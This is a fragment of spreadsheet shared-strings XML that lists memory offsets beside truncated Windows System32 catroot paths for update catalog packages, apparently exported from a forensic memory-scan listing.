  <si>
    <t>0xdf695db8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_410_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf696028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_416_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6963a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6964e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf696820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6969f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_418_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf696d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_417_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf697028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf697190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3184143~31bf</t>
  </si>
  <si>
    <t>0xdf697368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf697680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf697998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf697ba0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3159398~31bf</t>
  </si>
  <si>
    <t>0xdf697d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_41_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf698300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_422_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6986e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_421_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf698820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_425_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6989f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_420_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf698d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_420_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf698e50</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_421_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf699320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_427_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_426_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_424_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_429_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_423_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf699f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_422_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69a2c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf69a5d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf69a8f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf69ac08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf69af80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_428_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69b320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_433_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69b460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_436_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69b638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_432_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69b950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_430_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69bc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf69bda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_431_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69bf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_42_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69c278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_439_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69c590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_438_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69c6d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf69c8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_437_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69cc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_435_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69cf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_434_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69d228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>[0K_x001B_[141G</t>
  </si>
  <si>
    <t>0xdf69d430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_44_for_KB2923545~31bf</t>
  </si>
  <si>
    <t>0xdf69d608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf69d920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf69dc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf69dd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69dee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_43_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf69e288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_44_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf69e5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_44_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69e6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_45_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69e8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_44_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf69ebd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_441_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69eee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_440_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf69f180</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_47_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69f2c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2479943~31bf3</t>
  </si>
  <si>
    <t>0xdf69f498</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_46_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf69f7b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_46_for_KB2808679~31bf</t>
  </si>
  <si>
    <t>0xdf69fac8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_45_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf69fd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_46_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf69fee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_45_for_KB2984976~31bf</t>
  </si>
  <si>
    <t>0xdf6a01c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2604115~31bf3</t>
  </si>
  <si>
    <t>0xdf6a04d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2579686~31bf3</t>
  </si>
  <si>
    <t>0xdf6a08b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_48_for_KB2813430~31bf</t>
  </si>
  <si>
    <t>0xdf6a09f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2685939~31bf3</t>
  </si>
  <si>
    <t>0xdf6a0bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_47_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6a0f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_47_for_KB2893519~31bf</t>
  </si>
  <si>
    <t>0xdf6a10b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2719857~31bf3</t>
  </si>
  <si>
    <t>0xdf6a1368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2820331~31bf3</t>
  </si>
  <si>
    <t>0xdf6a17e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2698365~31bf3</t>
  </si>
  <si>
    <t>0xdf6a1b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2656356~31bf3</t>
  </si>
  <si>
    <t>0xdf6a1e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2621440~31bf3</t>
  </si>
  <si>
    <t>0xdf6a1f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2761217~31bf3</t>
  </si>
  <si>
    <t>0xdf6a2178</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB3124275~31bf3</t>
  </si>
  <si>
    <t>0xdf6a2490</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB3021917~31bf3</t>
  </si>
  <si>
    <t>0xdf6a25d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_502_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6a27a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2973201~31bf3</t>
  </si>
  <si>
    <t>0xdf6a2ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2908783~31bf3</t>
  </si>
  <si>
    <t>0xdf6a2dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB2750841~31bf3</t>
  </si>
  <si>
    <t>0xdf6a2f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6a31c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_53_for_KB2574819~31bf</t>
  </si>
  <si>
    <t>0xdf6a34d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_504_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6a3618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_54_for_KB2574819~31bf</t>
  </si>
  <si>
    <t>0xdf6a37f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_503_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6a3b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB982018~31bf38</t>
  </si>
  <si>
    <t>0xdf6a3e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_4_for_KB4483458~31bf3</t>
  </si>
  <si>
    <t>0xdf6a4430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_55_for_KB2894844~31bf</t>
  </si>
  <si>
    <t>0xdf6a4570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_55_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf6a4748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_54_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6a4a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_54_for_KB3133977~31bf</t>
  </si>
  <si>
    <t>0xdf6a4c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_55_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6a4e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_53_for_KB3133977~31bf</t>
  </si>
  <si>
    <t>0xdf6a5118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_57_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf6a5430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_57_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6a5638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_57_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf6a5810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_56_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6a5b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_55_for_KB982018~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.3.2</t>
  </si>
  <si>
    <t>0xdf6a5e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_55_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6a5f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_56_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf6a6128</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf6a6440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6a67f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_57_for_KB982018~31bf3</t>
  </si>
  <si>
    <t>0xdf6a69c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_57_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6a6aa0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB2923545~31bf</t>
  </si>
  <si>
    <t>0xdf6a6be0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6a71d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf6a7508</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6a76e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf6a79f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6a7d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf6a7f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_58_for_KB982018~31bf3</t>
  </si>
  <si>
    <t>0xdf6a8028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB2984976~31bf</t>
  </si>
  <si>
    <t>0xdf6a8300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB982018~31bf3</t>
  </si>
  <si>
    <t>0xdf6a8618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf6a89f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6a8b38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2509553~31bf3</t>
  </si>
  <si>
    <t>0xdf6a8d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_59_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf6a9320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2552343~31bf3</t>
  </si>
  <si>
    <t>0xdf6a9638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2547666~31bf3</t>
  </si>
  <si>
    <t>0xdf6a9950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2534366~31bf3</t>
  </si>
  <si>
    <t>0xdf6a9c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2506212~31bf3</t>
  </si>
  <si>
    <t>0xdf6a9da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2563227~31bf3</t>
  </si>
  <si>
    <t>0xdf6a9f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2425227~31bf3</t>
  </si>
  <si>
    <t>0xdf6aa028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2564958~31bf3</t>
  </si>
  <si>
    <t>0xdf6aa300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2639308~31bf3</t>
  </si>
  <si>
    <t>0xdf6aa508</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2654428~31bf3</t>
  </si>
  <si>
    <t>0xdf6aa6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2621440~31bf3</t>
  </si>
  <si>
    <t>0xdf6aa9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2585542~31bf3</t>
  </si>
  <si>
    <t>0xdf6aad10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2579686~31bf3</t>
  </si>
  <si>
    <t>0xdf6aae50</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2631813~31bf3</t>
  </si>
  <si>
    <t>0xdf6ab320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2690533~31bf3</t>
  </si>
  <si>
    <t>0xdf6ab638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2685939~31bf3</t>
  </si>
  <si>
    <t>0xdf6ab778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2703157~31bf3</t>
  </si>
  <si>
    <t>0xdf6ab950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2667402~31bf3</t>
  </si>
  <si>
    <t>0xdf6abc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2653956~31bf3</t>
  </si>
  <si>
    <t>0xdf6abf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2640148~31bf3</t>
  </si>
  <si>
    <t>0xdf6ac400</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2807986~31bf3</t>
  </si>
  <si>
    <t>0xdf6ac5d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2729452~31bf3</t>
  </si>
  <si>
    <t>0xdf6ac8f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2729094~31bf3</t>
  </si>
  <si>
    <t>0xdf6acc08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2705219~31bf3</t>
  </si>
  <si>
    <t>0xdf6ace10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2799926~31bf3</t>
  </si>
  <si>
    <t>0xdf6acf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2698365~31bf3</t>
  </si>
  <si>
    <t>0xdf6ad258</t>
